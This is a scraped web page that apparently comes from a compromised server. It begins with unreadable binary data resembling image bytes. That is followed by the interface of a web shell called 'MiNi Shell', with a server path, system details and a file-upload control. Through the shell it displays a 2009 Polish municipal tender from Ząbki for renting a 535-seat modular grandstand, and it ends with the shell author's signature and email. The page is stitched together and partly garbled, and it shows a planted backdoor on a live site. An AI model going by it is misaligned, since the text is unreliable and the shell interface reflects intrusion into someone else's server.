JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/226992-N-2009.html

<p class="kh_header"><b>Ząbki: Przedmiotem zamówienia są usługi w zakresie wynajmu trybun modułowych z 535 siedziskami stadionowymi dla potrzeb Miejskiego Ośrodka Sportu i Rekreacji (M.O.S.i R.) w Ząbkach przy ul. Słowackiego 21.</b><br>
<b>Numer ogłoszenia: 226992 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Wojska Polskiego 10, 05-091 Ząbki, woj. mazowieckie, tel. 022 7816814, faks 022 7816813.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zabki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są usługi w zakresie wynajmu trybun modułowych z 535 siedziskami stadionowymi dla potrzeb Miejskiego Ośrodka Sportu i Rekreacji (M.O.S.i R.) w Ząbkach przy ul. Słowackiego 21..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Szczegółowy opis przedmiotu zamówienia
1.1.Zakres przedmiotu zamówienia obejmuje dostawę i montaż na obiekcie M.O.S.i R. w Ząbkach, wynajem trybuny przestawnej (składanej) wraz z 535 krzesełkami z oparciem oraz podłogą z profili aluminiowych oraz demontaż i wywóz po zakończeniu okresu najmu.
1.2.dane techniczne:
-   wymagana ilość miejsc -  trybuna na minimum 535 osób;
-  maksymalne wymiary: 40 m długość x 15,00 m głębokość (trybuna z podestem i wejściami na trybunę od tyłu);
-  wysokość balustrady (barier bocznych trybun) musi wynosić minimum 1,10 m, aby zapewnić bezpieczeństwo publiczności na nich zasiadających.
1.3.Przedmiot zamówienia winien spełniać następujące wymogi:
1.3.1.konstrukcja:
1.3.1.1.podstawa konstrukcji nośnej trybuny winny stanowić ramy wykonane z rur  aluminiowych, anodowanych, w tym:
- szerokość wejścia na trybunę: minimum 2,00 m,
- szerokość przejścia pomiędzy rzędami: minimum 0,40 m;
1.3.1.2.konstrukcja trybuny modułowa, tzn. powinna zapewniać możliwość ustawienia trybuny w różnych konfiguracjach, zarówno jeżeli chodzi  o ilość modułów jak i ilość rzędów;
1.3.1.3.konstrukcja trybuny nie może zatrzymywać wody z opadów atmosferycznych;
1.3.1.4.konstrukcja trybuny musi zawierać podstopnie (wypełnione szczeliny pomiędzy siedziskami a podłogą) zapobiegające spadaniu przedmiotów pod widownię;
1.3.1.5.podłoga trybuny wykonana z aluminiowych pomostów. Nie dopuszcza się łączenia krat na środku stopni lub podłogi pod krzesełkami;
1.3.1.6.trybuna powinna być wyposażona w barierki tylne i boczne. Barierki wykonane z profili aluminiowych o wysokości co najmniej 1,10 m.;
1.3.1.7.konstrukcja trybuny musi pozwalać na regulację wysokości (stopy regulujące w zakresie min. 4,00 cm), w celu zapewnienia poziomowania trybuny na nierównym terenie oraz możliwości jej ustawienia na podłożu trawiastym o niewielkich nierównościach terenu;
1.3.1.8.poszczególne elementy trybuny powinny łączyć się ze sobą w jedną całość przy pomocy elementów złączonych bez użycia śrub;
1.3.1.9.konstrukcja musi być: lekka, stabilna, bezpieczna i wytrzymała;
1.3.2.siedziska: 
1.3.2.1.siedzisko musi być jednorodnym odlewem z trudnopalnego tworzywa sztucznego,
1.3.2.2.siedzisko musi posiadać wysokie oparcie o następujących wymiarach:
- wysokość min. 40 cm,
- szerokość min. 40 cm,
- głębokość min. 40 cm;
1.3.2.3.rząd pierwszych siedzisk musi znajdować się na wysokości ok. 1,10 m (? 5 cm);
1.3.2.4.podstawa siedziska musi przylegać całym swym obwodem do miejsca zamocowania i posiadać otwory montażowe osłonięte zaślepkami;
1.3.2.5.siedzisko musi posiadać między sobą zachowany odstęp wynoszący             min. 3,00 cm;
1.3.2.6.siedzisko wykonane z tworzywa sztucznego odporne na warunki atmosferyczne i promieniowanie UV;
1.3.2.7.siedzisko musi posiadać certyfikat klasyfikacji ogniowej (potwierdzający trudno zapalność);
1.3.2.8.Zamawiający nie określa profili siedzisk. Krzesełka na trybunach mają być: bezpieczną, ergonomiczną konstrukcją zapewniającą podparcie pleców;
1.3.3.bezpieczeństwo:
1.3.3.1.konstrukcja trybuny, jej rozplanowanie powinno być zgodne z obowiązującymi normami i przepisami bezpieczeństwa oraz normami Prawa budowlanego;
1.3.3.2.trybuny muszą zapewnić swobodną komunikację i różnicę wysokości pomiędzy rzędami zapewniającą nieograniczoną widoczność.
1.4.Wymogi dodatkowe:
1.4.1.jako załączniki do oferty Wykonawca zobowiązany jest dostarczyć:
- rysunki techniczne przedstawiające oferowaną trybunę wraz z opisem technicznym,
- dokument potwierdzający zgodność oferty z wymogami określonymi  w opisie przedmiotu zamówienia, tzw. Tabela zgodności przedstawionej oferty                      z wymogami określonymi w ppkt 3.3.1, 3.3.2 i 3.3.3 - dla każdej pozycji poszczególnego punktu.
2.Wszelkie pomiary umożliwiające właściwy dobór konstrukcji dla wykonania przedmiotu zamówienia, tj. montażu trybun leżą po stronie Wykonawcy.
3.Wykonawca ponosi wyłączną odpowiedzialność za jakość i terminowość świadczonego przedmiotu zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 92.62.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1.1.Posiadają uprawnienia do wykonywania działalności w przedmiocie zamówienia;
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej terminowe wykonanie zamówienia przy założeniu, że płatność za realizację przedmiotu zamówienia będzie dokonana na warunkach określonych w niniejszej SIWZ tzn. w terminie do 30 dni od dnia otrzymania faktury VAT.
1.4.Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp;
2. Opis oceny spełniania warunków:
2.1.w odniesieniu do warunku, o którym mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, obowiązkiem jest wykazanie posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.2.w odniesieniu do warunku, o którym mowa w art. 22 ust. 1 pkt 2, obowiązkiem jest posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  tj. wykazania, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia jest krótszy w tym okresie -  Wykonawca wykonał co najmniej trzy usługi w zakresie wynajmu trybun (widowni) modułowych przestawnych (składanych) wraz z montażem i demontażem, w tym co najmniej jedną trybunę na min. 500 miejscami, każda o wartości (netto) nie mniejszej niż 50.000,00 zł (słownie:  pięćdziesiąt tysięcy złotych) - w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN wg średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych. 
2.3.  Potencjał finansowo-ekonomiczny: Wykonawca musi wykazać posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na wartość co najmniej 50 000,00 PLN (słownie: pięćdziesiąt tysięcy złotych zero groszy).
3.Ocena spełnienia w/w warunków dokonywana będzie na podstawie oświadczeń i dokumentów wskazanych w Rozdziale  IV niniejszej SIWZ wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykaz oświadczeń i dokumentów wymaganych w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:
1.1.Oświadczenie, że spełniają warunki określone w art. 22 ust. 1 ustawy Pzp - stanowiące Załącznik Nr 1 do niniejszej SIWZ.
1.2.Oświadczenie o niepodleganiu wykluczeniu z postępowania na mocy art. 24 ust. 1 i 2 ustawy Pzp - stanowiące Załącznik Nr 2 do niniejszej SIWZ.
1.3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4.Wykaz wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, zakresu realizacji, dat i miejsca wykonania oraz podmiotów na rzecz których były one realizowane, w tym co najmniej trzy usługi w zakresie wynajmu trybun (widowni) modułowych przestawnych (składanych) wraz z montażem i demontażem, w tym co najmniej jednej trybuny na min. 500 miejsc, każda o wartości netto nie mniejszej niż 50.000,00 zł (słownie:  pięćdziesiąt tysięcy złotych) - w przypadku podania wartości w innych walutach zostanie ona przeliczona na PLN wg średniego kursu NBP na dzień ukazania się ogłoszenia w Biuletynie Zamówień Publicznych. Wykaz należy sporządzić wg wzoru stanowiącego Załącznik Nr 3 do niniejszej SIWZ. Do wykazu należy załączyć dokumenty potwierdzające, że wymienione w wykazie usługi zostały wykonane należycie (podpisane przez osoby uprawnione do reprezentacji podmiotów, które je wystawiły). 
1.5.Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności z sumą ubezpieczenia na wartość, co najmniej 50 000,00 PLN (słownie: pięćdziesiąt tysięcy złotych zero groszy).
1.6.Parafowany wzór Umowy stanowiący  Załącznik Nr 4 do niniejszej SIWZ.
2.Gdy ofertę składa spółka z ograniczoną odpowiedzialnością, a wartość oferty dwukrotnie przewyższa wartość kapitału zakładowego a złożona oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy wymagane jest przedstawienie stosownego dokumentu (uchwała wspólników lub umowa spółki) w trybie art. 230 ustawy z dnia 15 września 2000 r. - Kodeks spółek handlowych (Dz. U. Nr 94, poz. 1037 z późn. zm.).
3.W przypadku składania oferty wspólnej (konsorcjum):
3.1.Do oferty należy dołączyć:
a.	ustanowienie Pełnomocnika do reprezentowania wszystkich wykonawców wchodzących w skład konsorcjum poprzez udzielenie stosownego pełnomocnictwa;
b.Oświadczenie, o którym mowa w pkt 1 ppkt 1.1.  podpisane przez pełnomocnika;
c.Oświadczenie, o którym mowa pkt 1 ppkt 1.2 oraz dokumenty wymienione  w pkt 1 od ppkt 1.3. składa każdy z Wykonawców wchodzących w skład konsorcjum            z osobna;
d.pozostałe dokumenty składane są wspólnie;
3.2.podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań;
3.3.w przypadku wyboru złożonej oferty jako najkorzystniejszej, Zamawiający wezwie do przedstawienia umowy regulującej współpracę podmiotów występujących wspólnie podpisaną przez wszystkich partnerów, przy czym termin na jaki została zawarta umowa nie może być krótszy niż termin realizacji zamówienia.
4.W przypadku, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej mają zastosowanie przepisy § 2 oraz § 4 ust. 3 rozporządzenia   Prezesa  Rady   Ministrów   w   sprawie   rodzajów   dokumentów,  jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty  mogą   być  składane  (Dz. U. z  2006 r.  Nr 87,  poz. 605 z późn. zm.). Wszystkie dokumenty i oświadczenia sporządzone w jeżyku obcym należy złożyć z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
5.Wymagane dokumenty powinny być złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy. Za osoby uprawnione do reprezentowania Wykonawcy uznaje się osoby upoważnione do reprezentowania firmy, wskazane we właściwym rejestrze lub ewidencji działalności gospodarczej. 
6.W przypadku, gdy upoważnienie do reprezentowania Wykonawcy nie wynika bezpośrednio z  dokumentów rejestrowych Wykonawcy, do oferty należy dołączyć pełnomocnictwo. Pełnomocnictwo do reprezentowania Wykonawcy powinno jednoznacznie określać zakres umocowania i być złożone w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://umzabki.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Ząbki
ul. Wojska Polskiego 10
05-091 Ząbki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2009 godzina 09:00, miejsce: Urząd Miasta Ząbki, Biuro Obsługi Interesanta
ul. Wojska Polskiego 10
05-091 Ząbki.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com